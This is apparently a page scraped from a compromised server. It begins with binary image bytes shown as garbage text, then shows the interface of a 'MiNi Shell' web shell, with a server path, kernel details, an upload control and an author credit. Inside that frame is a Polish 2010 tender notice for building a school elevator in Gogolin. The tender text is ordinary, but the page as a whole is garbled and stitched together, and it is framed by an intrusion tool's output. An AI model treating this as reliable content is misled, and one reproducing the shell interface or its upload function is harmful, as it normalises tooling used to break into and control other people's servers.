JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/15454-N-2010.html

<p class="kh_header"><b>Gogolin: Budowa windy dla osób niepełnosprawnych Gimnazjum w Gogolinie - Likwidacja barier architektonicznych w budynku Gimnazjum, zakup i montaż urządzenia szybu windowego w ciągu komunikacyjnym budynku w Publicznym Gimnazjum w Gogolinie</b><br>
<b>Numer ogłoszenia: 15454 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum im. A. Einsteina w Gogolinie , ul. Szkolna 27, 47-320 Gogolin, woj. opolskie, tel. 0-77 4666294, faks 0-77 4666294.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gimnazjum.gogolin.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa windy dla osób niepełnosprawnych Gimnazjum w Gogolinie - Likwidacja barier architektonicznych w budynku Gimnazjum, zakup i montaż urządzenia szybu windowego w ciągu komunikacyjnym budynku w Publicznym Gimnazjum w Gogolinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy inwestycji obejmuje budowę wewnętrznego szybu windowego dla dźwigu osobowego - kabina windy o wymiarach wewnętrznych 110cm na 140 cm wraz z montażem dźwigu.
Dane techniczne urządzeń dźwigowych:
Udźwig - 630 kg
Prędkość - min 0,62 m/s
Ilość przystanków - 6 szt
Ilość drzwi przystankowych - 6 szt
Kabina przelotowa o wymiarach szer x głęb x wysokość - 1100 x 14400 x 2150 mm
Drzwi kabinowe automatyczne teleskopowe 2-panelowe o wymiarach - 900 x 2000 mm
Drzwi szybowe automatyczne teleskopowe 2 - panelowe o wymiarach - 900 x 2000 mm
Szyb o wymiarach szer x głęb - 1550 x 1900 mm
Wysokość podnoszenia - 17,5 m
Podszybie - 1200 mm
Nadszybie - 400 mm 
Maszynownia - dolna boczna
Sterowanie - mikroprocesowe

Oczekiwania inwestora w zakresie standardu i wyposażenia windy:
-  kabina w wykonaniu ze stali nierdzewnej i podłogą antypoślizgową i lustrem  
   przynajmniej na jednej ścianie,
-  kabina wyposażona powinna być w urządzenie umożliwiające komunikację głosową pasażera windy z sekretariatem,
-  kabina powinna być wyposażona w system komunikacji głosowej informującym o aktualnym położeniu windy,
-  kaseta sterująca powinna być umieszczona na wysokości umożliwiającej obsługę jej przez osoby na wózku inwalidzkim,
-  dostęp do panelu sterującego windy powinien być zakodowany i uruchamiany jedynie za pośrednictwem karty chipowej (oczekiwana ilość kart 20 szt.).

1.	Roboty budowlane będą się odbywały w czynnym obiekcie szkoły podczas roku szkolnego.
2.	Roboty uciążliwe będą mogły być wykonywane dopiero po godzinie 1400.
3.	W okresie od 26 kwietnia do 10 maja należy przewidzieć wykonanie tylko uzgodnionych z Dyrekcją szkoły robót wykończeniowych (ze względu na egzaminy maturalne i gimnazjalne).
4.	Należy przewidzieć wydzielenie części korytarzy na wszystkich kondygnacjach uniemożliwiające przedostawanie się na teren budowy osób postronnych (za wyjątkiem okazyjnego dostawania się obsługi biblioteki znajdującej się na pierwszym piętrze) oraz przedostawanie się kurzu z części remontowanej na pozostałą część szkoły. 
5.	Wydzielenie musi zapewniać warunki bhp i p.poż. oraz będzie stanowiło granicę odnowienia ścian i sufitu korytarza po wykonanych robotach remontowych.
6.	Dodatkowo należy przewidzieć wyposażenie w poręcz ze stali nierdzewnej zejście do biblioteki i do sali gimnastycznej.
7.	Należy przewidzieć demontaż i zamontowanie nowych drzwi w pomieszczeniu biblioteki oraz wykonanie nowego otworu drzwiowego i zamurowanie istniejącego z obrobieniem, otynkowaniem i pomalowaniem całości pomieszczenia.
8.	Inwestor przewiduje również wykonanie robót zewnętrznych umożliwiających dostawanie się osoby niepełnosprawnej na poziom posadzki parteru w formie podjazdu dla osób niepełnosprawnych od strony boisk sportowych z wykonaniem niezbędnego zakresu oporęczowania, przebudowę istniejących schodów oraz poszerzenie podestu.
9.	Przebudowa ścianek wiatrołapu przy wejściu.
10.	Wymiana wykładziny w pomieszczeniu biblioteki.
11.	W części przyziemia i parteru znajdują się w rejonie prowadzonych robót rury instalacyjne, okablowanie elektryczne i monitoring. Należy uwzględnić przekładki tych rur i kabli oraz obudowę płytą katronowo-gipsową z pomalowaniem.
12.	Należy przewidzieć pomalowanie wszystkich sal lekcyjnych i pomieszczeń, które będą związane z robotami podstawowymi.
13.	Na ostatniej kondygnacji należy przewidzieć zamurowanie istniejącego okna kolidującego                      z szybem windowym oraz wykonanie wyprawy elewacyjnej w kolorystyce i technologii zbliżonej do pozostałej części elewacji.
14.	Wykonanie instalacji zasilania elektrycznego windy i maszynowni windy.

 Do obowiązków Wykonawcy ponadto będzie należało:
- dokonanie wizji w terenie i wykonanie ewentualnych pomiarów uzupełniających pozwalających na wykonanie prawidłowej oferty,
- opracowanie projektu organizacji ruchu oraz załączonego do projektu BIOZ projektu organizacji placu budowy,
- zapewnienie stałego nadzoru kierownika budowy, 
- opracowanie projektu powykonawczego uzgodnionego z Urzędem Dozoru Technicznego w Opolu oraz dopuszczenie przez UDT urządzenia dźwigowego do użytkowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.21.00.00-2, 45.40.00.00-1, 45.45.00.00-6, 45.31.00.00-3, 45.33.00.00-9, 45.35.00.00-5, 45.20.00.00-9, 45.10.00.00-8, 45.50.00.00-2, 51.50.00.00-7, 31.60.00.00-2, 31.70.00.00-3, 42.99.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki art. 22 ust. 1 ustawy Pzp, dotyczące:
1.  Posiadania wiedzy i doświadczenia
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedno zadanie polegające na budowie szybu i montażu dźwigu.
2.   Dysponowania osobami zdolnymi do wykonania zamówienia
Wykonawca musi mieć do dyspozycji osoby posiadające uprawnienia i doświadczenie do kierowania robotami, w szczególności:         
a) Kierownika robót budowlanych posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, posiadającym co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi i doświadczenie w kierowaniu robotami przy co najmniej jednej  inwestycji o podobnym charakterze jak przedmiot zamówienia 
3.   Sytuacji ekonomicznej i finansowej 
Wykonawca musi wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż  300 tys. zł (trzysta tysięcy złotych)

UWAGI:
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawcy powinni przedłożyć następujące dokumenty:
1.	 Oświadczenie o spełnieniu warunków udziału w postępowaniu (zgodnie z treścią Formularza 2.2.)
2.	Informację o doświadczeniu Wykonawcy (Doświadczenie zawodowe), (zgodną z treścią Formularza 2.3.) Do informacji powinny być dołączone dokumenty potwierdzające, że wymienione w informacji roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Jeżeli Wykonawca będzie polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi przedstawić pisemne zobowiązanie tych podmiotów  do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (zgodnie z treścią  Formularza 2.4. Potencjał kadrowy). Wykaz musi zawierać dane na temat kwalifikacji wskazanych osób.
Jeżeli Wykonawca będzie polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą, że wysokość posiadanych środków finansowych lub zdolność kredytowa Wykonawcy jest nie mniejsza niż 300 tys zł. Powyższe dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli wykonawca wykazując spełnienie tego warunku polega na zdolnościach finansowych innych podmiotów, wymaga się przedłożenia informacji banku lub kasy oszczędnościowo-kredytowej o których mowa powyżej, dotyczącej tych podmiotów.

W celu wykazania braku podstaw do wykluczenia wykonawcy z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art.24 ust 1 ustawy pzp, Zamawiający żąda następujących dokumentów: 
1.	Oświadczenia o braku podstaw do wykluczenia (zgodnie z treścią Formularza 2.5.),
2.	Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust 1 pkt 2 ustawy pzp (Formularz 2.6.),
3.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gimnazjum.gogolin.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum im. Alberta Einsteina w Gogolinie
ul. Szkolna 27
47-320 Gogolin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 09:30, miejsce: Publiczne Gimnazjum im. Alberta Einsteina w Gogolinie, ul. Szkolna 27, 47-320 Gogolin, w sekretariacie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com